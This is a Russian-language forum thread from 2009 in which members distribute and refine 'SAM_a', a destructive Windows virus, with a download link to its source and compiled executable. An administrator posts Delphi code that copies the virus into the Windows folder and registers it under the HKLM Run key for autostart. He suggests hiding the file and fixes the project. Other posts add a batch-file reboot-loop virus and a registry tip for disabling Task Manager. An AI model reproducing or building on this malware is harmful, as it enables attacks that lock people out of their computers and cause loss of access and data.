|
Sam_A by JAW
| |
| Jaw | Дата: Воскресенье, 22.03.2009, 00:15 | Сообщение # 1 |
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
| Выкладываю исходник вируса: "SAM_a"
Функции:
--//Запрещает безопасный режим.(возможно неработает непроверял)
--//Отключает Ctr-Alt-Del.
--//Выключает ПК при загрузке.
--//Прописыватся в автозагрузке.
--//Отключает клавиатуру и мышь.(За эту функцию спасибо dolphin'у).
PS:В архиве исходники и *.EXE уже скомпилированый.
PSS:Хотел еще добавит функцию размножения по сети...но кому нужно тот сам добавит подумал я и нажпл "Enter"...
Ссылка на скачку>>>http://multi-up.com/70872
Сообщение отредактировал Jaw - Воскресенье, 22.03.2009, 00:17 |
| |
| |
| dolphin | Дата: Воскресенье, 22.03.2009, 11:49 | Сообщение # 2 |
Администратор
Сообщений: 906
Статус: Offline
| Смотрел, код выглядит довольно не оптимизированным, и серьёзный твой косяк с автозагрузкой >>>
Ты не скопировался при запуске куданибудь, для вирусов это очень важно!Автозагрузка делается подругому кординально.
Ещё, можно обойтись без модуля и без таймера, это всё очень громоздко! Скопироваться можно так>>>
Code CopyFile(PChar(ParamStr(0)), PChar('C:\Windows\' + ExtractFileName(ParamStr(0))), True);
Прописать в автозагрузку себя скопированного>>>
Code Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',true);
Reg.WriteString('Project1','C:\Windows\Project1.exe');
Reg.CloseKey;
Reg.Free;
Вместо project1 пишешь название своей программы P.S. Можно послать скопировавшемуся вирусу атребуты неводимый, только для чтения и т.п. Удачной работы!!! 
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| Jaw | Дата: Воскресенье, 22.03.2009, 12:04 | Сообщение # 3 |
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
| чет напойму как скопироваться?а точнее куда вставлять этот код?
Сообщение отредактировал Jaw - Воскресенье, 22.03.2009, 12:06 |
| |
| |
| dolphin | Дата: Воскресенье, 22.03.2009, 12:11 | Сообщение # 4 |
|
Администратор
Сообщений: 906
Статус: Offline
| В процедуру FormCreate Но при условии (if)!!! что файл не находится в указанноай дирекктории!
В ту же процедуру и при том же if прописываемся в автозагрузку.
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| Jaw | Дата: Воскресенье, 22.03.2009, 12:13 | Сообщение # 5 |
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
| можешь это исправить в моем проекте?
|
| |
| |
| dolphin | Дата: Воскресенье, 22.03.2009, 12:16 | Сообщение # 6 |
|
Администратор
Сообщений: 906
Статус: Offline
| Да, щас сделаем
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| dolphin | Дата: Воскресенье, 22.03.2009, 12:21 | Сообщение # 7 |
|
Администратор
Сообщений: 906
Статус: Offline
| Тоько некак до меня не дойдёт для чего нужен этот код>>>
Code
Form1:=TForm1.Create(nil); //Создаём невидимую форму
Application.Run;
h:=CreateEvent(nil, true, false, 'et'); //Делаем пустое событие.
while (true) do //Пока не будет true
begin
WaitForSingleObject(h, 1000); //каждую секунду
Application.ProcessMessages; //передавать управление программе
end;
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| Jaw | Дата: Воскресенье, 22.03.2009, 12:25 | Сообщение # 8 |
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
| Это для последущего выключения ПК.
|
| |
| |
| dolphin | Дата: Воскресенье, 22.03.2009, 12:30 | Сообщение # 9 |
|
Администратор
Сообщений: 906
Статус: Offline
| Эта процедура не выключит компьютер, помоему она просто дает программы больше оперативной памяти
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| Jaw | Дата: Воскресенье, 22.03.2009, 12:34 | Сообщение # 10 |
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
| мб-мб..
|
| |
| |
| dolphin | Дата: Воскресенье, 22.03.2009, 12:50 | Сообщение # 11 |
|
Администратор
Сообщений: 906
Статус: Offline
| Все процедуры я уже написал, осталось написать обработчик, эт не долго 
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| Jaw | Дата: Воскресенье, 22.03.2009, 12:57 | Сообщение # 12 |
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
| жду..
|
| |
| |
| dolphin | Дата: Воскресенье, 22.03.2009, 13:29 | Сообщение # 13 |
|
Администратор
Сообщений: 906
Статус: Offline
| В принцепе всё готово только заморочка насчет директории щас решу и всё 
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| dolphin | Дата: Воскресенье, 22.03.2009, 13:53 | Сообщение # 14 |
|
Администратор
Сообщений: 906
Статус: Offline
| Посмотри что получилось, не уверен с действиями в реестре, но вроде всё так
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| Jaw | Дата: Воскресенье, 22.03.2009, 14:08 | Сообщение # 15 |
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
| +Отключение безопасного режима работает.
+Работает выключение после загрузки.
|
| |
| |
| dolphin | Дата: Воскресенье, 22.03.2009, 14:13 | Сообщение # 16 |
|
Администратор
Сообщений: 906
Статус: Offline
| Думаю моя помощь больше не понадобится?
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| Jaw | Дата: Воскресенье, 22.03.2009, 14:16 | Сообщение # 17 |
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
| Скорей всего да(всмысле непонадобится).
|
| |
| |
| dolphin | Дата: Воскресенье, 22.03.2009, 14:21 | Сообщение # 18 |
|
Администратор
Сообщений: 906
Статус: Offline
| Да, Jaw, автозагрузка и вся программа будет работать лишь в том случае если имя екзишника будет Sam_A.exe
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| dolphin | Дата: Воскресенье, 22.03.2009, 14:22 | Сообщение # 19 |
|
Администратор
Сообщений: 906
Статус: Offline
| Имя программы 
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| Jaw | Дата: Воскресенье, 22.03.2009, 14:40 | Сообщение # 20 |
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
| Я об этом уж догоадался..но всеровно спс.
|
| |
| |
| tatsu | Дата: Суббота, 30.05.2009, 21:02 | Сообщение # 21 |
Частый гость
Зарегистрирован: 17.05.2009
Группа: Пользователи
Сообщений: 27
Статус: Offline
| Люди ))))).... я такого зверька ма BAT`е делал. он самокопировался в system32, писался в реестр на автозагрузку, блочил реестр и уводил комп в циклическую перезагрузку.
Ибо маст дай!
|
| |
| |
| AD0 | Дата: Суббота, 13.06.2009, 23:01 | Сообщение # 22 |
Группа: Удаленные
| кстати с именем вопрос тоже можно решить) насколько мне помниться имя файла с * не задается в обычных форточках) а как имя для поиска без проблем можно попробовать=) так же помню в батниках если прописывать можно использовать как прямую ссылку и обычную свзяь там еще значками доллара обозначается
Сообщение отредактировал AD0 - Суббота, 13.06.2009, 23:15 |
| |
| |
| fren | Дата: Вторник, 17.11.2009, 13:52 | Сообщение # 23 |
Частый гость
Зарегистрирован: 12.12.2008
Группа: Пользователи
Сообщений: 34
Статус: Offline
| оуу...и не знал что можно блокировать безопасный режим  Можно пожалуйста по подробней про отключение безопасного режима...исходник скачать не могу...
Сообщение отредактировал fren - Вторник, 17.11.2009, 14:00 |
| |
| |
| xlin | Дата: Среда, 03.02.2010, 17:39 | Сообщение # 24 |
|
Группа: Удаленные
| Одна неувязочка.... для того чтобы отключить диспетчер задач,ветку реестра необходимо поменять, и тогда все будет работать (reg.rootkey:=hkey_current_user;)
|
| |
| |
| Marra_Kesh | Дата: Суббота, 15.05.2010, 08:50 | Сообщение # 25 |
Постоянный
Зарегистрирован: 19.12.2009
Группа: Модераторы
Сообщений: 182
Статус: Offline
| Здраствуйте. Допустим я запустил этот вирус у себя на компьютере, он соответственно перезагружается и нет доступа к безопасному режиму. Что делать? Я читал как-то в Интернете что надо BIOS "выгружать" как это!!! Есть способ удалить этот вирус
Заведующий палатой #6
|
| |
| |
|
